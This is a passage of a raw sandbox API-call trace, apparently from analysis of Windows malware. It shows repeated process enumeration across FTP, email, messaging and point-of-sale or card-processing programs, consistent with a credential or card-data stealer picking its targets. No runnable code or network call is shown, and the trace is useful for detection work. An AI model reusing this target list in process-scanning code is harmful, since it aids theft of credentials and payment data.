pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0256.443] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0256.445] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0256.447] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0256.452] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0256.454] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0256.456] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0256.457] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0256.459] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0256.461] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0256.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0256.515] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0256.517] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0256.519] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0256.520] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0256.522] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0256.523] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0256.525] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0256.527] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0256.531] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0256.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0256.534] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0256.536] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0256.537] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0256.539] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0256.540] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0256.545] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0256.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0256.548] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0256.549] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0256.551] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0256.552] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0256.554] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0256.555] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0256.557] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0256.619] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.621] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.623] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.624] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0256.626] CloseHandle (hObject=0x1d14) returned 1 [0256.626] Sleep (dwMilliseconds=0x64) [0256.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0256.793] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.797] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.799] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.800] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.802] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.803] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.806] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.824] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.826] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.828] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.830] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.831] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.833] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.834] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.836] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.837] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.965] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.967] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.969] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0256.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0256.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0256.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0256.979] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0256.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0256.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.994] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0256.996] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.998] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.999] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.001] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0257.002] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0257.004] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0257.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0257.007] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0257.009] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0257.136] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0257.138] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0257.140] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0257.142] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0257.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0257.146] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0257.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 